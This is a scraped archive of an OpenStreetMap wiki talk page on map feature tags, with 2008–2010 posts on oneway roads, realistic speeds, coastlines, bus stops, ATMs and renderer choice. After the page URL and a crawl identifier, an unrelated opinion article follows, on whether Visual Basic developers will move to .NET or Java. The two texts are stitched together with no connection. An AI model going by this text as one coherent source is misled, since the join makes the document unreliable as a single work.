oneway. This is kind of important in cities where the norm is oneway streets. Erik Johansson 07:13, 12 May 2008 (UTC) - Both of this exapmples are helpful to override default oneway=yes for motorways, trunks. For most other types of highways this is not necessary, as oneway=false is by default. As for cities where most streets are oneway you still need to tag them oneway=yes, while there will not be supposed mechanism to override defaults for particular area (and that seems to be hard)--LEAn 16:46, 6 June 2008 (UTC) Realistic Speed "limit" We've got our "maxspeed" and "minspeed". Great for route calculation. However, on a lot of the roads that im mapping currently, it is impossible to actually reach "maxspeed", simply because the roads are "twisty" and small. maxspeed=80 kmh but the realistic speed is 30-40 kmh. So how about adding a "realisticspeed" tag or "recommended_max" or something. It would be a great addition for any route calculation software to be able to read this tag and exclude roads that slow down the trip. - I know what you mean but I don't think that it is a good idea to add reccomended speed as this depends greatly on the driver and the for instance a motorbike could go down the road at 50km/h while a lorry or a car with a trailer on the backmay be able to go no faster than 30km/h. However if Open Street Map were to add a driving directions feature in the future it could be good for giving estimated journey time because at the moment most sites, e.g. Google Maps, Windows Live Maps, give unrealistic times. - Ballysallagh1 17 August 2008 - I'm not sure a real-speed-tag is the correct way to do it. To really make this good you need real statistics from real vehicles, so you get differnt speeds at different hours of the day. Im some towns the real speed is 100 km/h in the middle of the night, and perhaps 5 km/h in the morning, but only in weekdays. And perhaps that kind of data is best kept in some other database separately? - Without this kind of data I still think it would be possible to make a time estimation algoritm semi good, by using data that is already in the map anyway. Perhaps sharp turns can affect the time. Perhaps if the road is narrow. The occurance of speedbump, of course. Number of lanes. Type of surface. Etc. - And as Ballysallah pointed out. All this is vehicle dependent. A Ferrari might care less if the road bends than a truck. A Land Rover might care less of speedbumps than the others. A motorcycle will care less if the road is narrow. - --Henriko 23:19, 4 May 2009 (UTC) Water, land and coastlines I just tried it out with many combinatons. This is the result which works with Mapnik and Osmarender: Only coastlines need the correct direction. "Coastline" islands on "coastline" water must be drawn counter-clockwise. They don't need layer tags. The mapping direction of water and land does not matter. But "land" islands must have a higher layer than "water" water. BTW: Osmarender renders "water" and "land" with Bezier curves, but "coastline" polygonal. --Plenz 06:19, 28 February 2008 (UTC) bus_stop vs bus_halt Using josm, i've been proposed either bus_stop or bus_halt (in "highway" spot). I'd consider a "bus_stop" being a place where a bus could sporadically stop for a long moment (i have a friend who is a bus driver, and there are such places where they can take their break and wait for a while) whereas i'd consider bus_halt any plae where the bus lets people step in and out... If i am wrong in my understanding, shouldn't then bus_halt be deprecated? What's the global proportion of use of those? - Personally I would say a bus_halt is not British English. I certainly haven't heard that phrase used. Smsm1 10:45, 25 March 2008 (UTC) Some tags are oneway sensitive, means that reversing the order of nodes will impact the meaning of this tag (e.g. oneway=true of course but also rounabout, coastline, etc...). I would propose to mark such tags in the Map Features page with a symbol like this : . This would allow later the editors to identify such tags and, for instance, raise (at least) a warning message when a user tries to reverse a way tagged with this key.Pieren 21:11, 24 March 2008 (UTC) - I see no problems with it, you can just do it.. If someone complains then we can have a fight over it. Erik Johansson 07:15, 12 May 2008 (UTC) - I think that it's a good idea as well. Ballysallagh1 17 August 2008 Simplify highway link I would like to simplify the highway link types like motorway_link, trunk_link,... I would just use "highway = motorway" and "link=yes". So it wouldbe possible to use "link" in all highway categories, e.g. for a "bypass" lane in a roundabout. I think it is also better to use for a routing software. Also it could be used for railroads. Garry Talk page clean-up and expectations We should clean-up this talk-page (some are obsolete, some could be moved into other pages). And most important, we should also explain/discuss what the Map Features page should be, and what should go somewhere else, e.g. into related pages like the Tag:key=value pages. --Pieren 10:49, 5 June 2008 (UTC) - To adress the clean-up problem, I created an archive page where I moved all discussions not commented upon since 2006. If this is a workable solution (multiple archive pages will most likely later be needed), I can move somewhat later discussions as well (perhaps June 2007?). Note that there might be discussions on the archive page that would better be stored in conjunction with the topic itself. In that case I suggest moving the actual discussion to the talk page of the topic, but to leave a link trail on the archive page.--sanna 07:59, 6 June 2008 (UTC) Column "render" or "Mapnik"/"Osmarender" UrSuS replaced the column "Render" by two colums "Mapnik" ãnd "Osmarender" in some tables. I don't think it's a good idea. First, we cannot show everything in one page (we have the subpages Tag:key=value for such examples, pictures,etc). Second, why limiting to two renderers ? Next will be Kosmos and so on (potentially no limit). Third, we have to keep the size of the page (amount of KB) under control (it was an issue earlier this year before the wiki software was updated). So, between the two extreme positions where people would like text only (no pics, no imgs at all) and others with all renderers examples, my proposal is to keep a single render column with one example and move other rendering samples into the related Tag pages. --Pieren 12:32, 6 June 2008 (UTC) - I agree. And just to add a note about Kosmos: there aren't any "official" rendering styles for map features in Kosmos, so there isn't any point in adding samples to the Map Features page. --Breki 16:32, 6 June 2008 (UTC) - Ok, I got it, but then we need to include just on type of redenring: Mapnik or Osmarender, becouse curretnly render examples are messed. Ursus 13:40, 9 June 2008 (UTC) - Hmm, now is 2010 and we still don't have decision about this. I suggest Mapnik, because it's default view on map in osm.org. If there will be no objections I can replace images. Yarl ✉ 13:41, 4 March 2010 (UTC) - And why Mapnik ? Osmarender is also present on main page and is rendering much more things than Mapnik. The remark I gave two years ago is still valid. If Kosmos is a bad example, we can take 'cycle map' or any of the dozen Cloudmade rendering styles. It is important to understand and explain over and over again that OSM is a geodatabase and Mapnik is not THE osm map but just a showroom. --Pieren 13:52, 4 March 2010 (UTC) - OK, I understand you. I'm not a big fan of Mapnik, rather some of Cloudmade styles. I just, like Ursus, don't like current mess. Page "Main Features" is very useful for beginers (of course not only) and vast majority of them use Mapnik. And I think they should know what is render-able at the moment, because they can be disappointed seeing no effects. Yarl ✉ 20:44, 6 March 2010 (UTC) Hi! How should I tag a road like . Is this a track or a unclassified highway? Feel free to add the photo to the samples list if usefull! ciao Detlef I cant really be sure of the scale on the image. I think this would be "unclassified" since it looks like there are 2 roads with grass in between. A track is when the grass part in the middele, goes under 1 car, and the left and right side wheels go on each side of the grass. Swimming pools I see water_park under amenities, but not swimming pools. Many smaller towns in the U.S. will have a public swimming pools. RickH86 15:13, 11 July 2008 (UTC) Wrong picture? I think that the picture next to Trunk Link is wrong as I think it should be next to Primary Link. I would just like a second opinion before I change it. - I think the picture for traffic_calming=table is not a good one. I would classify that as a hump (long bump). It's not even a car legth. --Japa-fi 14:50, 30 October 2008 (UTC) - I took it from Wikipedia (). --Magol 14:16, 31 October 2008 (UTC) Wrong picture (shop=furnace) The picture for Tag:shop=furnace shows a fur shop, not a furnace shop. If it were only used in the main map feature page I might have corrected it, but it also seems to be used in many nationalized map feature pages. I don't suppose there's an easy way to recursively change it? I wouldn't want to delete it because someone might want to use it for a Tag:shop=fur tag. --tesche 18:16, 1 November 2010 (UTC+1) Zoom level of map features I am looking for information which map feature will be rendered at which zoom level. For example on zoom level 0 (world) streets are not printed. When you zoom in at some point they "appear". Some features seem to be even more tricky as they are not visible on low zoom levels and on very high zoom levels. For example names of cities are neither printed on "world" zoom level (0) nor on zoom level 18. I understand that this makes sense as it improves the picture quality and readability. But who defines this and where is it written down? Thanks for help. --Spuerhund 14:56, 27 August 2008 (UTC) - On the OpenStreetMap mapnik layer the mapnik stylesheet specifies at which level items appear and disappear. File is located here: . Feature or Bug reports can be reported here: Login using OSM login, add new ticket, assign to steve8@mdx.ac.uk - osmarender layer is controlled it's stylesheets here: Oceanographic information and adding roads What are your thoughts on adding oceanographic information to make openstreetmap also a nautical chart. - OpenStreetMap is a wiki :-) Add what you would like to see on a map. Firefishy 01:05, 28 August 2008 (UTC) Next thing I wonder is how to add and split roads. When I add a road, it immediately disappears again. On one place the roads are faulty connected, how do I change this? I mean, there is a 3-connection between roads, and two going out are the same (has the same name) and the third one is another road. However when I mark them the highlight in the wrong way, and I don't understand how to remedy this. --Ravn Hawk 16:20, 27 August 2008 (UTC) - Forum or a mail list would be a better place for this question. Firefishy 01:05, 28 August 2008 (UTC) How map a turnstile? How is a tunstile to be mapped? My suggestion would be... ... to map the way as highway=footway oneway=yes and a point at the position of the turnstile as highway=gate . --Gypakk 23:02, 31 August 2008 (UTC) bank with an atm this page says : "a bank (for a bank that also has an ATM, use amenity=bank and atm=yes)". but there's also amenity=atm, so in the end we have at least two ways to tag atms... seems confusing. also, this supplemental tag is not listed on amenity=bank. i think amenity=atm would be better tag to use in all situations. marking it as connected to the particular bank branch could be done with relations (if required at all). - It's not currently possible to tag this way anyway (you can't use the same tag twice) Circeus 02:06, 23 October 2008 (UTC:: - People have been using semicolons forever to give a tag 2 values: amenity=bank;atm spaetz 13:37, 5 November 2008 (UTC) Rendering rules I think there needs to be an additional section on this page detailing how features and tags are interpreted, or should be interpreted, by the renderer. Or if not here then on one of the development pages. I've seen Mapnik (for example) draw a layer-1 footpath over a layer-0 secondary highway and then on the same page draw a layer-0 tram line over a layer-1 trunk highway. From this and other things it's obvious that neither tag type or layer number are being used as the primary sorting heuristic to the drawing algorithm. It's also not clear how borders and bridge outlines should be rendered...they can't be drawn together by tag type because otherwise different highway type borders would overlap each other. And they can't be drawn together by layer since it's obvious that the map itself isn't drawn by layer alone. A little bit of clarification here would save developers like myself hours of trawling through source code and script files. What about these? I have some shops that I don't know what keywords to use. - Clothes: primarily or only clothes - Department stores: Household items, but not (or almost no) furniture - Furniture+: Furniture but also sell a lot of other stuff, like appliances, computers and televisions - Beauty: Shops that sell beauty supplies but don't do hairdressing - Copy: Shops that do photocopying and sell paper (and related) supplies - Communication: Stores that sell mobile phones and/or satellite dishes and subscriptions (I know that this is a proposed keyword, but JOSM doesn't recognize it and it doesn't get rendered by any of the map renderers so it must not be official) - Storage: Places meant for (temporary) storage — Val42 20:52, 25 October 2008 (UTC) amenity=shelter is proposal Is it right that only tags are listed on the map feature page that are approved? I saw that amenity=shelter is listed here, but it is just in proposal state (), no vote started. So I think it's not a official tag und should not be exist on the map features page. Don't know if I'm right, but if I am, it should be removed. I think it's not good if anybody list proposed feature here if they are not approved. I'm not very familiar with the way how tags get into the map features list. Can anyone tell me if my point of view is right? S.A.L. 16:34, 16 November 2008 (UTC) - If it's in widespread use (I haven't checked the tagwatch) and without conflicting uses, then it's good and ok to have it on the map features until someone proposes something that requires it to be replaced by something else. Alv 17:16, 16 November 2008 (UTC) - But doesn't that mean, that we do not need the proposal state with the voting option, because map features can be inserted without any voting? A further problem is, that this way a proposal will be a proposal forever, because noone can see the need of a discussion if the proposed feature is already listed in the map features. It makes a proposal senseless S.A.L. 22:58, 16 November 2008 (UTC) - amenity=shelter looks to be voted on by old standards. I would say, yes, it needs to go to vote on the new standards before being added to the map feature page if not already there. looks like User:ULFL has been adding features based on usage rather than being voted to acceptance by the comunity.--Nickvet419 00:57, 17 November 2008 (UTC) Proposal for all map features sub-templates It would be very helpful if the all the map features templates (e.g. highway) contained a bit of wikisyntax to optionally disable feature descriptions, e.g.: {{#ifeq: {{{motorway:show}}} | no || |- | [[{{]]}}} }} instead of the current: |- | [[{{]]}}} |- That way someone using the individual templates could call {{Map Features:highway | motorway:show = no}} to hide that specific entry. I'm asking for this because I'm translating the page into Icelandic where a lot of these features -- like motorways -- simply don't exist. --Ævar Arnfjörð Bjarmason 06:03, 4 January 2009 (UTC) - Icelanders may also want to map other countries, so it might make more sense to explain what the feature is and that it isn't used in Iceland. That's how it is done in some other languages. --abunai 00:16, 15 January 2009 (UTC) - Isn't there a motorway being constructed (at least it was summer 2008) between Reykavik and Keflavik? Gorm 00:59, 15 June 2009 (UTC) Map Features: Re-organizing Hi, Natural Resources Canada shows a nice organization of all the types of data... earth sciences. See Perhaps the different features can be placed into these main categories or a variation of it? Purpose: To make it easier for users to find the information they are looking for. --acrosscanadatrails 10:57, 16 January 2009 (UTC) Clarification for charge=* I find this tag very useful for route planing, but I believe it needs a bit of clarification. Usually fees are different for different kind of vehicles (eg. motorcycles, small cars, small cars with trailer, trucks), so maybe it would be useful to have charge:truck=*, charge:car+trailer=* and leave general charge=* for all other, not specified vehicles. For example in Germany where only trucks have to pay Maut on motorways it may look like this charge=0 charge:truck+e2+a6=20 EUR (Euro 2 truck with 6 axles) It seems to be too long comparing to other tags, so maybe charge=(truck+e2+a6:20 EUR)(car:5 EUR)0 - but this instead would be hard to keep in order... Please share your comments Uazz 19:15, 15 April 2009 (UTC) This page needs a legend This page needs a legend for the element icons ( ), preferably linked to the appropriate wiki page for that element. They may be obvious to experienced users, but I'm new to OSM. I can guess, but am not sure of what they mean. --Hrynkiw 22:09, 27 April 2009 (UTC) - These icons are used on many different pages, so a legend on Map Features wouldn't solve the general problem. Would it work from an usability perspective to add links to the icon templates (Template:iconWay etc.) so you could click on them for an explanation, e.g. the appropriate section on the Elements page? (I'm not entirely sure how to implement that technically, but assume it is possible.) --Tordanik 11:34, 28 April 2009 (UTC) - Why not just change the alt-text for the images to say 'path', 'node', and 'area'? I'm not a web developer, but I'm assuming that would be straightforward. --DanHomerick 05:32, 25 September 2009 (UTC) noexit Discussion moved: Talk:Key:noexit Inline Skating Is the tag "sport skating" valid for inline skating too? If yes it would make sense to add it in the comments field. The idea is to mark all roads where in-line skating is possible cause of street quality. Maybe the quality would be an interesting attribute (bad - very good) ??? - Mapping regular streets as sport facilities does not feel quite right. I think it is better to try classify roads and foot paths by the quality of its surface more generally. Unfortunately there is still many discussions about how to grade this, and few decisions. But I think the best right now is to use smoothness=excellent. See Key:smoothness. --Henriko 23:48, 4 May 2009 (UTC) I think the smoothness tag is not enough to describe if a road is suitable for inlines skating. Even if the smoothness are excellent, the road also needs to have good visibility, no 90 degree corners, no intersecting roads at every 25 meters etc etc. I would also be glad to have a tag that clearly shows how suitable it is for inlines skating. For road bikes, the problem is basically the same. Any suggestions of how to solve this? --zvenzzon 20:25, 16 Sept 2009 Inclines Highway=incline and highway=incline_steep haven't been defined properly, and are probably not verifiable. As Key:incline has been created maybe the old tags should be moved to deprecated features. Peter James 21:10, 6 June 2009 (UTC) - Totally agree on this. I would even go so far as to suggest have all occurences (bot-work?) of "highway=incline"/"highway=incline_steep" replaced with "highway=road" and "incline=incline"/"incline=incline_steep". Not pretty, but conserves the information while highlighting the situation in JOSM validator etc. Gorm 00:04, 15 June 2009 (UTC) Abutters Key:abutters is on both Map Features and Deprecated Features. If the tag is deprecated should this be indicated on Map Features or just removed? Peter James 21:40, 6 June 2009 (UTC) cycleway track The picture attached to "cycleway track" is misleading. --Keichwa 01:56, 24 July 2009 (UTC) - In OSM terms the grass and trees in this picture are sufficient to make the cycleway a separate track. If it were a solitary cycleway "in the woods", as in the map example, people would eventually draw it separately as a highway=cycleway. It could be a bit clearer (but I don't know how that would fit in the table) but at the moment both cases are shown, and they are then better described at Key:cycleway. The cycleway=track becomes redundant once the solitary cycleway is drawn as a separate way. Alv 06:30, 24 July 2009 (UTC) Fire lookout towers There are many hundreds (if not thousands) of Fire Lookout Towers sprinkled all over the planet. Most are no longer in use, since the advent of telephones and population increase. OSM really needs to recognize these types of features natively. More info here for those nostalgic for older times and things: --Oisact 20:51, 8 August 2009 (UTC) Map key The map key that's shown on the map if you click the button in the left, doesn't show tertiary, unclassified, residential or service... It also shows "unsurfaced", which to my knowledge isn't rendered anymore. I'm sure it's pretty outdated. Remember that new users or people just browsing the map probably use that one. Perhaps it should be updated and also maybe localized? /Grillo 18:54, 17 August 2009 (UTC) picnic-site i see tags about 'picnic site' and i can't see Icons on the map? --Abonino 07:03, 30 August 2009 (UTC) bad link? "well, see tracktype=* for more guidance." the link go on a new side, but 20cm down i see a head of chapter "Tracktype". Bad link? regards --Abonino 07:06, 30 August 2009 (UTC) - The template with the highway values isn't only used on Map Features, but also, for example, on Key:highway. It's easier to use the same text for all pages including the template, so we need a link that works everywhere, not just on Map Features. - This shouldn't be a problem as the tracktype section on Map Features and Key:tracktype are identical, too - they also use the same template. --Tordanik 08:09, 30 August 2009 (UTC) Speed cameras This symbol doesn't show up in the osm renderer. Shouldn't this tag be changed to reflect the discussion here: leisure=park vs. leisure=nature_reserve The page describing Tag:leisure=park has the suggestion that it should be for municipal parks, and that nature_reserve should be used for natural parks like Yosemite (in California, USA). But it also has a TODO, and doesn't give the air of being settled. Furthermore, there's not even a page describing what a Tag:leisure=nature_reserve is. Has the community decided on what the dividing line between parks and nature_reserves should be? In the US, we have an official designation called 'Wilderness Area' that is applied to some parts of some parks. A 'Wilderness Area' indicates that roads can't be built there, and that even the number of backpackers heading into the area is limited. It's a reserve for nature in a fairly strict sense. But then there are 'parks' like Big Basin Redwood Park, which is a large park that is kept natural, but which doesn't carry the extra protections of a Wilderness Area. Nature_reserve, or park? What's the main criteria for separation? Is it the amount of protection for the reserved nature, or is it just how natural the area appears to be? --DanHomerick 05:50, 25 September 2009 (UTC) Pier Is the picture of man_made=pier correct? It looks very similar to leisure=marina. The UK idea of a pier is more as something like [1] or [2]. Is the UK or US usage intended? Proboscis 15:41, 25 September 2009 (UTC) - They're overlapping things, aren't they? A marina is an area, that may include many piers within it. So, when looking at a pier, you might very well be looking at a little part of a marina. We could choose a picture of a pier that isn't used as a part of a marina (like the ones you linked to), but perhaps the initial confusion is good, so long as we clarify the overlapping nature in text. --DanHomerick 15:52, 25 September 2009 (UTC) Urban Streets As a new OSMer, I'm puzzled regarding how to tag some urban and suburban streets. In many cases, they are not tertiary (they don't really go anywhere), they are not residential (no residences within many blocks), and they are not unclassified (often four or six lanes wide as opposed to the two lanes in the unclassified guideline). Surely this has been addressed and I'm missing it. But, it seems that there needs to be something like 'highway=urban_street' or 'highway=retail_access' or similar to address these streets. TIGER data in my city (Fort Worth, TX) seems to arbitrarily set them as either unclassified or as residential. Granted, in a few cases there is a high-rise condo building present, but access to that isn't the primary purpose of the street. Or have I missed a solution that is already in place? turbodog 10:30, 1 October 2009 (UTC) - It would be helpful to post a link to an example of the streets. My first reaction to your post is, "6 lane roads that don't really go anywhere? Wow, everything IS bigger in Texas..." =) --DanHomerick 04:50, 2 October 2009 (UTC) - Well the example I was thinking of is only four lanes (plus parking lanes), such, as Main St. in Fort Worth (haven't figured out how to add map links yet). It's nine blocks long. It's currently classified residential, but there are no residences, nor does it lead to residences. Unclassified seems a bit of a put down for Main St. in a Texas city that's pushing a million people :-), but that's probably the way to go under the current system. -- turbodog, 11:09, 3 October 2009 (UTC) - I've done some more study in the wiki and various Talk sections, and decided that functionality rather than physical characteristic is the primary, although certainly not sole, driver in highway keys. So, for the case I have described, i.e., a wide urban street that doesn't extend past the confines of a relatively small urban area, the "proper" (if there is one) way to key it, since there is no "urban_street" key is as "unclassified" with "lanes=4". Concur?turbodog, 06:02, 4 October 2009 (UTC) Sort order Some sections of map features are sorted alphabetically and some are organised in a different order, either by frequency of use or by importance or just a bit random? Can we review what would be best in each case? Here is a list of the main ones:- PeterIto 10:40, 23 October 2009 (UTC) - Highways - listed in road hierarchy with motorway first - looks good to me (PeterIto) - barriers - a bit random as far as I can see - would alphabetical be better (PeterIto)? - Cycleway - in a logical order - looks fine to me (PeterIto) - Waterway - in order of usage with most common at the top - looks fine to me (PeterIto) - Railway - in order of usage with most common at the top - looks fine to me (PeterIto) - Railway:Additional features is alphabetical - looks fine to me (PeterIto) - Aeroway - in order of useage with most common at the top - looks fine to me (PeterIto) - Manmade - is in alphabetical order - Leisure - is a bit random to my eyes - I suggest alphabetical would be better as there is no clear order of importance (PeterIto) - Amenity - some sub-sections are alphabetical, others look a bit random from my perspective (PeterIto) - Shops - are in alphabetical order - Tourism - are in alphabetical order - Historic - was nearly alphabetical, I tweeked it to make it strictly alphabetical (PeterIto) - Landuse - I (PeterIto) have just made it alphabetical but it has been suggested that this is not helpful - Military - Almost alphabetical - I suggest it should be strict alphabetical (PeterIto) - Natural - Alphabetical - Sport - Alphabetical There are some other smaller sections not mentioned in the list.:22, 7 December 2009 (UTC)
https://wiki.openstreetmap.org/wiki/Talk:Map_features/Archive_1
CC-MAIN-2021-17
refinedweb
14,635
69.52
28 August 2012 06:42 [Source: ICIS news] By Trisha Huang MELBOURNE (ICIS)--Spot prices of methyl isobutyl ketone (MIBK) in ?xml:namespace> Supply of spot cargoes to The turnaround will overlap with a three-and-a-half month shutdown planned by “MIBK prices may rise in Asia because of the overlapping shutdowns in An unplanned shutdown of Mitsui Chemicals’ plant in late April had triggered a surge in MIBK prices to a record average of $2,190/tonne (€1,752/tonne) CFR (cost and freight) Prices subsequently crashed by 22% to $1,705/tonne CFR China by the week ended 10 July, as high costs prompted end-users in the solvents and rubber chemicals sectors to either seek out lower-priced substitutes, like butyl acetate (butac), or slash output altogether. Prices have since rebounded to an average of $1,785/tonne CFR China for the week ended 21 August, ICIS data showed. Of greater concern to MIBK buyers in The South Korean company has been seeking to import about 1,500-2,000 tonnes of MIBK a month to meet an anticipated supply shortfall between September and December. “Kumho’s intention to purchase spot supplies from overseas producers, together with the recent increases in naphtha and therefore propylene costs, could drive up MIBK prices in the region,” a trader said. Weekly naphtha prices have risen 14% for the four weeks ended 24 August to $967.25/tonne CFR Japan, according to ICIS data. As such, mounting costs of naphtha derivatives propylene and benzene are expected to exert upwards pressure on the prices of acetone, the feedstock for MIBK. Prices of propylene, for instance, have gained 5% over the same four-week period to reach $1,390/tonne CFR NE Asia for the week ended 24 August, ICIS data showed. Producers’ offers for MIBK cargoes loading in September have strengthened to $1,830-1,850/tonne CFR China/SE Asia, compared with deals for shipment this month at $1,750-1,780/tonne CFR China/SE Asia. In “Mitsui Chemicals supplies about 800 tonnes a month to Weak demand from the downstream solvents sectors means that MIBK output from local producers is adequate in meeting domestic requirements, according to producers and importers in the country. Domestic MIBK prices in Local pricing may fall below CNY14,000/tonne ex-tank/EXW by the second half of September, as “Demand from solvents end-users has weakened substantially,” the importer said. “We have been getting fewer buying enquiries in recent weeks.” Prices in Separately, Jilin Petrochemical is running its 15,000 tonne/year MIBK plant at full operating rate following a restart on 10 August. The plant was brought off line on 24 July to undergo repairs to the unit’s reactor. Demand from the coating sector in “MIBK producers in ($1 = €0.80 / $1 = CNY6.36)
http://www.icis.com/Articles/2012/08/28/9590188/asia-mibk-may-rise-on-better-demand-firm-feedstock.html
CC-MAIN-2014-49
refinedweb
474
54.36
51523/python-error-only-size-arrays-can-converted-python-scalars I'm trying to plot the exponential and logistic population models, but my code doesn't seem to work as well as I planned, what's wrong? Full Code: import numpy as np import matplotlib.pyplot as plt import math from IPython.display import clear_output\ print ("Utilize Which Growth Model of Population? (Type A or B)") ; print () ; print ("A Exponential Growth Model") ; print ("B Logistic Growth Model") ; print () ; A = int(1) ; #Exponential Growth Model B = int(2) ; #Logistic Growth Model C = input("Growth Model of choice : ") ; print () ; if C == 'A' : #Definition of Parameters print ("The Differential Equation of your chosen growth model is P'(t) = r*P(t)") ; print () ; print ("Where r = growth parameter") ; print ("Where P(t) = total population at a certain time t") ; print ("Where t = time") ; print () ; #Explanation of Differential Equation print ("This equation can be considered as the exponential differential equation") ; print ("because its solution is P(t) = P(0)*e^r*t ; where P(0) = Initial Population") ; print () ; print ("This equation can be portrayed by using this graph : ") #Graph Code x,y = np.meshgrid (np.linspace(-50, 50, 10), np.linspace(-50, 50, 10)) ; r = float (input ("Encode Growth Parameter :")) ; t = float (input ("At how many years do you want to solve? :")) ; P = float (input ("Encode Population Count :")) ; P = y ; t = x ; x = np.asarray (x, dtype='float64') Un = (P/P*(math.exp(r*t))) #Stack_overflow help from Adam.Er8 Vn = (P/P*(math.exp(r*t))) #Stack_overflow help from Adam.Er8 plt.quiver (x, y, Un, Vn) ; plt.plot ([8, 12, 25, 31], [1, 16, 20, 40]) ; plt.show () if C == 'B' : print ("The Differential Equation of your chosen growth model is y' = k*y*(M-y)") ; print () ; print ("Where k = slope of the function") ; print ("Where y = y-value at the specific point") ; print ("Where M = limit of y as x approaches infinity") ; print () ; print ("This equation is derived using *** ") ; You can plot the chart by taking ...READ MORE I am getting the following error while ...READ MORE This is my code for key in bboxes: bbox ...READ MORE import cv2 import numpy as np import matplotlib.pyplot as ...READ MORE pygame.Surface takes in integer values for building ...READ MORE Hi, good question. There is a module meant ...READ MORE You can also use the random library's ...READ MORE Syntax : list. count(value) Code: colors = ['red', 'green', ...READ MORE can you give an example using a ...READ MORE You can simply the built-in function in ...READ MORE OR Already have an account? Sign in.
https://www.edureka.co/community/51523/python-error-only-size-arrays-can-converted-python-scalars
CC-MAIN-2020-34
refinedweb
434
66.33
is there a way to keep track of how many upgrades youve bought? so this is what i did but i didnt work. code: using UnityEngine; using System.Collections; public class UpgradeManger : MonoBehaviour { public RPB click; public UnityEngine.UI.Text itemInfo; public UnityEngine.UI.Text items; public float cost; public int count = 0; public int clickPower; public string itemName; private float _newCost; [SerializeField] private float currentAmount; [SerializeField] private float speed; void Update() { itemInfo.text = "\n$" + cost; if (count > 24) { speed = 50; } items.text = count; } public void PurchasedUpgrade() { if (click.money >= cost) { click.money -= cost; count += 1; click.moneyperclick += clickPower; cost = Mathf.Round (cost * 1.05f); _newCost = Mathf.Pow (cost, _newCost = cost); } if (count > 24) { speed = 50; } } } error: Assets/UpgradeManger.cs(22,23): error CS0029: Cannot implicitly convert type int' to string' Show less int' to Answer by Garazbolg · Oct 12, 2015 at 10:48 AM This error appear just because you are missing a cast. C# cannot affect a integer into a string without you telling him to. But he can add them like in your line 18. Just change line 22 by items.text = count.ToString(); or items.text = ""+count; And thats because of the way integer et chararcters are stored in memory. integer are stored as they are so 10 => 10 but characters (each letters of a String) are stored in ascii the letter 'A' = 65. So for him to have a string that say '10' you need to tell him that you got 2 letters, one is 49 ('1') and the next if 48 ('0'). Hope this helped you. Amount of Upgrades. 1 Answer Problem with upgrade and long numbers 1 Answer How would I change my character's appearance by upgrading? 1 Answer Unity crashes whenever I try to modify a prefab 1 Answer [2D - Top Down] Camera track / Border control 1 Answer EnterpriseSocial Q&A
https://answers.unity.com/questions/1080509/amount-of-upgrades-1.html?sort=oldest
CC-MAIN-2022-05
refinedweb
310
68.77
The .NET invasion is proceeding a little more slowly than expected, but the all-but-inevitable market penetration continues. Many analysts predict that mainstream development organizations that adopt .NET will do so in time to deploy their first applications in Q3 of 2003. This soon-to-be seismic shift in the Microsoft development community has yet to produce the answer to a critical question for the future of software development—where will all the Visual Basic developers go? Visual Basic has provided a convenient on-ramp into software development for millions of developers. Microsoft found the sweet spot between providing enough power to produce serious applications and isolating the developer from some of the more messy and error-prone elements of Windows and component development. Now, much of that is going to change. With .NET, Microsoft has decided to create a development environment that continues to isolate the developer from platform-specific details, but coders will have to deal with component development. Developers will still be able to carry on without thinking about pointers, memory allocation, or how to create a Windows message handler, but they will no longer be able to ignore component design concepts such as inheritance, namespaces, and method overloading. As .NET moves past the early-adopter stage, Visual Basic developers will have little choice but to transition away from the cocoon that was Visual Basic 6.0. This impending “language shock” has led many commentators to speculate on how Visual Basic developers are going to react. Will they move to Java? Will they go ahead and make the jump to .NET and, if so, will it be C# or Visual Basic .NET? Will they demand that Microsoft continue to support Visual Basic 6.0 and let it remain a distinct development subculture? Will many simply not be able to make the transition and go find jobs in retail, where Java and C++ programmers have thought they should be in the first place? I don’t presume to make such predictions. But I do think it’s time to dispel three myths that have sprung up around this question. Myth #1: .NET is a radical change, so a move to Java would be just as easy Frank E. Gillett of Forester Research asserts the following: “For VB programmers—the vast majority of Microsoft shop coders—the leap to .NET programming is just as difficult as migrating to the Java 2 platform. What does this mean? Now is the right time for Microsoft IT shops to reconsider their commitment to Redmond and evaluate the Java 2 and .NET platforms and tools side by side.” This quote should come with a little warning tag that says: “Managers beware—this opinion could cost you a significant amount of unexpected expenditure!” The move from a Microsoft to a Java development organization is a major undertaking. If you are to look only at the language elements (particularly between Java and C#), you can understand where this idea originated. Certainly, the development and design skills required are similar and equally different from those required for a Visual Basic application. But many more significant factors come into play. The following is just a subset. Java development environments are nearly always more complicated The vast array of tools available in the Java environment—arguably one of its great strengths—naturally leads to many new applications and utilities (application servers, IDEs, debugging support applications) that a developer must master. Each new skill has its own learning curve, even if the development is going to be done in a Windows environment. Visual Studio, on the other hand, though much altered, will feel more natural in the hands of Visual Basic programmers. They will know immediately how to set a breakpoint or use code completion features. Making multiple simultaneous transitions—language, toolset, and infrastructure—increases the cost and failure rate of such a migration. Incremental transition is available with .NET Most development organizations have some serious deadlines hanging over their heads, and a few months of converting applications and infrastructure is not likely in the project plan. ASP.NET pages can run side-by-side with ASP pages and can share state management mechanisms, whereas the move to JSP is going to require a much wider conversion effort. Mechanisms for calling COM objects from C# and Visual Basic .NET have been explained ad nauseum in articles, books, and conference presentations. Integration with COM+ Services is well documented. A plethora of "From Visual Basic 6.0" material is available It has surprised me that very few resources are available that provide a clear path from Visual Basic to Java. Although I have seen some custom training classes for this and a few books (most out of date by now), there seems to be a conspicuous absence of this kind of material. As you would expect, there's a wide array of books describing the transition to Visual Basic .NET and C#, from the perspective of upgrading both code and skill. Developers will make the transition more quickly when reference to what they know is included in training materials. I suggest the following replacement for the above myth: The move to Java is not as easy as .NET, but if you were considering such a transition, now is the time to decide. The move to .NET is the most significant transition Microsoft has asked Visual developers to make since the beginning of Visual Basic. If you have been thinking about moving to Java, it would certainly make sense to do so before you incur that cost rather than after. Myth #2: Large numbers of Visual Basic developers are going to move to Java One of the compelling reasons to move to Java has been removed, namely that Java was light-years ahead of Visual Basic 6.0 in its ability to create large-scale, object-oriented applications. One could argue that Java is still better for this task, but at least now the question is up for debate. Before .NET, there was no question. Implementing robust object-oriented designs was all but impossible in the Visual environment. ASP was one giant kludge that often led to slow and unmaintainable code. You could write an entire book on Visual Basic and ASP AntiPatterns. Certainly most of those who were going to move to Java because of its technical superiority already have done so. Those who will take .NET as a cue to move to Java will likely be much smaller in number and will be motivated by other factors, such as vendor lock and security concerns. I think the future is relatively bright for VB developers. A percentage of developers will not be able to make the jump into hyper-speed. Visual Basic developers vary widely in their abilities and their development roles. On one end of the spectrum, they have been gluing Excel spreadsheets together and creating single screen utilities; on the other end they are writing highly distributed e-commerce applications. With some percentage of these developers, their interests, efforts, and abilities will fall somewhere between Visual Basic 6.0 and Visual Basic .NET. 